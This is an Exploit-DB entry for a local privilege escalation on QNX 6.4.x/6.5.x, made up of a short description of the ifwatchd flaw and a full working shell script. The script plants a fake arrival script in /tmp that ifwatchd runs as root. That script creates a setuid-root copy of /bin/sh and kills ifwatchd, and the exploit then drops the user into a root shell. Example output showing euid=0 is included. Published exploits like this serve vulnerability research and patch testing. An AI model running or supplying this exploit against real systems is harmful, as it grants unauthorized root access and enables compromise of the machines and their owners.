QNX 6.4.x/6.5.x ifwatchd - Local Privilege Escalation

EDB-ID:

32153


Author:

cenobyte

Type:

local


Platform:

QNX

Date:

2014-03-10


#!/bin/sh
#
#        QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013
#                         <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# Setuid root ifwatchd watches for addresses added to or deleted from network
# interfaces and calls up/down scripts for them. Any user can launch ifwatchd
# and provide arbitrary up/down scripts. Unfortunately ifwatchd does not drop
# privileges when executing user supplied scripts.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
#
# - exploit description:
# This exploit creates a fake arrival-script which will be executed as root by
# passing it to the -A parameter of /sbin/ifwatchd. The fake arrival-script
# copies /bin/sh to /tmp/shell and makes it setuid root. Once the setuid shell
# is in place ifwatchd will be killed to drop the user into the root shell.
#
# - example:
# $ uname -a
# QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86
# $ id
# uid=100(user) gid=100
# $ ./qnx-ifwatchd.sh
# QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013
#
# [-] creating fake arrival-script
# [-] executing ifwatchd, please wait
# Killed
# [-] now executing suid shell
# # id
# uid=100(user) gid=100 euid=0(root)

PATH=/bin:/usr/bin:/sbin

if [ ! -x /sbin/ifwatchd ]; then
	echo "error: cannot execute /sbin/ifwatchd"
	exit 1
fi

echo "QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013"
echo
echo "[-] creating fake arrival-script"
cat << _EOF_ > /tmp/0
#!/bin/sh
PATH=/bin:/usr/bin
IFWPID=\$(ps -edaf | grep "ifwatchd -A" | awk '!/grep/ { print \$2 }')
cp /bin/sh /tmp/shell
chown root:root /tmp/shell
chmod 4755 /tmp/shell
rm -f /tmp/0
kill -9 \$IFWPID
exit 0
_EOF_

chmod +x /tmp/0

echo "[-] executing ifwatchd, please wait"
ifwatchd -A /tmp/0 -v lo0 2>&1 >/dev/null
echo "[-] now executing suid shell"
/tmp/shell